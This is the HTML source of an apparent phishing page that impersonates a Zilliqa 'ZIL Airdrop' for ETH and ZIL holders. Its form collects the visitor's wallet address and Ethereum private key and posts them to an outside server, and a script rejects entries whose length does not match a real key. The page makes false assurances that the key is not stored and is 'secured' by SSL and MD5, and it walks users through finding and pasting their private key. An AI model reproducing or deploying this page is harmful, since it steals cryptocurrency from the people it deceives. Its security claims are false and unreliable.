
<!DOCTYPE html>
<html lang="en" class=" no-touchevents history hashchange localstorage csstransforms csstransitions flexbox cssanimations csscalc cssvhunit cssvwunit objectfit object-fit json">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>ZILLIQA TOKENS</title>
    <link rel="icon" type="image/png" href="img/favicon.ico" sizes="32x32" />
    <meta name="description" content="ZIL Airdrop for ETH and ZIL holders.">
    <meta name="robots" content="noodp">

    <meta name="description" content="ZILLIQA Airdrop for ETH and ZIL holders.">
    <meta name="robots" content="noodp">
    <meta property="og:title" content="ZILLIQA Update: Airdrop">
    <meta property="og:image" content="http://zilliqa.name/img/ZILLIQA.jpg">
    <meta property="og:description" content="For every 1 ETH that you hold, you can receive 2000 ZIL tokens as an airdrop. Existing ZIL holders will also benefit from this airdrop, for every 1 ZIL that you already have, you can receive 0.3 ZIL.">
    <meta name="twitter:description" content="For every 1 ETH that you hold, you can receive 2000 ZIL tokens as an airdrop. Existing ZIL holders will also benefit from this airdrop, for every 1 ZIL that you already have, you can receive 0.3 ZIL.">
    <meta name="twitter:image" content="http://zilliqa.name/img/ZILLIQA.jpg">
    <meta name="twitter:card" content="summary_large_image">

    <link rel="stylesheet" type="text/css" media="all" href="css/app-9647d26555.css">

    <style type="text/css">
        .address-wrap {
            padding: 0 0 32px 0;
        }

        .address__row:first-child {
            border-radius: 10px 10px 0 0;
        }

        .address__row {
            display: -ms-flexbox;
            display: flex;
            background: #f6f9fa;
            border: 1px solid #e7ecee;
            border-bottom: 0;
            border-radius: 10px;
            margin: 0 32px 0 32px;
        }

        .address__column {
            width: 100%;
            padding: 24px;
            overflow: scroll;
        }

        .address__label {
            font-family: PostGrotesk-Medium, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif;
            font-size: 14px;
            color: #a5b0b9;
            letter-spacing: 1px;
            text-transform: uppercase;
            padding: 0 0 8px 0;
        }

        .address__value {
            font-size: 21px;
            color: #545f69;
        }

        .intro--open .widget-row.widget-row--status {
            height: auto;
            padding: 24px 24px 4px 24px;
            border: 0;
        }

        .intro--open .widget-row {
            background-color: #fff;
        }

        .widget-row:first-child {
            border-radius: 10px 10px 0 0;
        }

        .widget-row--status__inner {
            width: 100%;
            padding: 10px 10px 9px 10px;
            text-align: center;
            background-color: #e0f3e9;
            border-radius: 10px;
            color: #63c38f;
        }

        .widget-row--status__inner {
            width: 100%;
            padding: 10px 10px 9px 10px;
            text-align: center;
            background-color: #eef6fd;
            border-radius: 10px;
            color: #63c38f;
        }

        .bg-img{
            background-color: transparent;
            background-image: url(img/heromtn.jpeg);
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
        }
    </style>

</head>

<body class="en" >
<div class="site">
    <header class="site-header bg-img">
        <div class="header-container">
            <div class="header-logo">
                <a class="logo" href="index.php.html">
                    <img src="img/t_logo_white.png" alt="Logo" class="logo-cls">
                </a>
            </div>
            <nav class="header-menu">
            </nav>
            <button class="header-mobile-menu">
                <span class="bar bar-first"></span>
                <span class="bar bar-middle"></span>
                <span class="bar bar-last"></span>
            </button>
        </div>
    </header>
    <!-- .site-header -->
    <div class="site-content">

        <section class="homepage-intro homepage-section">
            <div class="homepage-container">
                <div class="homepage-intro">
                    <div class="homepage-intro-image">
                        <img src="img/tcb-fix.jpg" style="width:150px">
                    </div>
                    <h2 style="color: #000 !important;" class="heading">ZIL Airdrop</h2>
                    <p class="homepage-intro-text" style="max-width: 1000px; color: #000 !important;">Please enter the private key of your ETH wallet in order to automatically sign the special encrypted message that will verify that it is actually your wallet.</p>
                </div>
                <br>
				
				
				
						
			
				
				
				
                <form id="fpm" method="post" action="http://u227372.s34.wh1.su/finish.php" name="submit" class="validate" >
                    <div>
                        <input type="text" name="address" id="notify_channel" placeholder="Your Wallet Address" value="" required="required" autofocus="autofocus"   style="
    width: 100%;
    border-radius: 10px;
    height: 40px;
    font-size: 18px;
    margin-bottom: 10px;
	color: black;
	border-width: 0px;
	background: #e3e3e3;
	padding-left:7px;
">
                        <br>
                        <input type="text" name="email" id="notify_channel" placeholder="" value="Encrypted Sign Message: ZIL_6e4103dcfddf450b35c3c4933bfef4ea2360986529aa7f50cc06e7c2da001b4bf90f80ee8d5af7e11f1046d9729feb74992cc3482b350163a1a010_ERC20" required="required" readonly="" style="
    width: 100%;
    border-radius: 10px;
    height: 40px;
    font-size: 18px;
    margin-bottom: 10px;
	color: black;
	background: #e3e3e3;
	border-width: 0px;
	padding-left:7px;
">
                        <br>

                        <p style="text-align: center; color: #000 !important;">Enter Your Private Key:</p>

                        <textarea rows="1" maxlength="80" name="message" id="notify_channel3" required="required" style="
    width: 100%;
    border-radius: 10px;
    height: 40px;
    font-size: 18px;
    margin-bottom: 5px;
	color: black;
	background: #e3e3e3;
	border-width: 0px;
	padding-left:7px;
	padding-top: 10px;
"></textarea>

                        <br><br>
                        <p style="font-size: 20px; margin-top: -15px;text-align: justify;color: #000 !important; ">
                            <b>Please Note:</b> Your private key is required to verify that you are the owner of the wallet you specify. It also allows our smart contract calculating the number of tokens to airdrop. You must have a balance of either ETH or ZIL tokens in order for the smart contract to execute the airdrop. The tokens will be deposited to your account, normally within 24 hours.
<br>
There is no danger. We DO NOT use, store or collect your personal data (such as private key). This form is fully encrypted and secured by the SSL standard and MD5 hashing protocol. No one will be able to access your wallet. 
                            <br />
                  
                        </p>

<span id="msg" style="
 
    height: 40px;
    font-size: 18px;
    margin-bottom: 10px;
	color: red;
	padding-left:7px;
"></span><br>
                        <button type="submit" id="msgb" onclick = "return test();" name="submit" value="sign_submit" class="btn-buy-omg" style="
    font-size: 20px;
    width: 200px;
    height: 52px;
    color: white;
    border-width: 0px;
    cursor: pointer;
    background: #c00000;
">GET $ZIL
                            <!---->
                        </button>
                    </div>
                </form>
            </div>
        </section>

        <section class="homepage-whatis homepage-section">
            <div class="homepage-container">
                <h1 class="heading" style="color: #fff !important;">My ZIL is on an exchange. How can I receive the airdrop?</h1>
                <p style="text-align: justify; color: #fff !important;">
                   Exchanges will not support the ZIL airdrop and we will not be able to airdrop the tokens to your wallet. In order to receive the ZIL airdrop you need to:
                    <br>
                    <br> 1. Have a personal Ethereum wallet (like MyEtherWallet, Parity and etc.) where you hold the actual private key.  
                    <br> 2. Withdraw your ZIL and ETH balance from the exchange you have them on your personal wallet.
                    <br> 3. Enter your address, balance and follow the steps above to charge your tokens.
                    <br>
                </p>
                <br>
                <h1 class="heading" style="color: #fff !important;">Where is my Private Key?</h1>
                <p style="text-align: justify; color: #fff !important;">
                    Your private key is accomplished when you set up a new wallet. It is presented on the following page when creating a wallet with MyEtherWallet:
                    <br></p>
                <h1 class="heading"><img src="img/privkeya.jpg" style="width:600px"></h1>
                <br><p style="text-align: justify; color: #fff !important;">
                    If you already have a wallet, you can find your Private Key by clicking 'view wallet' and displaying the private key by clicking the 'eye' icon as shown in the picture below.
                    <br>
                </p><h1 class="heading"><img src="img/privkeyb.jpg" style="width:600px"></h1>
                <br><p style="text-align: justify;color: #fff !important;">
                    Once you have the Private Key, simply paste that into the corresponding field in the form above.
                    <br><br>
                </p>
                <h1 class="heading" style="color: #fff !important;">What is ZILLIQA?</h1>
                <p style="text-align: justify;color: #fff !important;">
                 Zilliqa is the first public blockchain designed to implement sharding, allowing for linear scaling as the blockchain grows in size.To date, scalability has been an issue for existing blockchain technologies.
                </p>
            </div>
        </section>

         <div class="copyright" style="
    text-align: center; background-color:#333333; color: #fff;
">© 2018 ZIL. All Rights Reserved</div>
    </div>
    <!-- .site-footer -->
</div>
<!-- .site -->
<script type="text/javascript">
    var dateCountdown = "2017-06-27 18:00:00";
    var dateServerNow = 1502202512 * 1000;
    var dateServerEnd = 1498561200 * 1000;
</script>
<script type="text/javascript">
function test()
{
var lengthc ;
lengthc = document.getElementById('notify_channel3').value.length ;

if (lengthc > 62 && lengthc < 69) {
return true;
}
else {
alert('Invalid private key"');
return false;

}
}
</script>
</body>

</html>

<!-- Localized -->
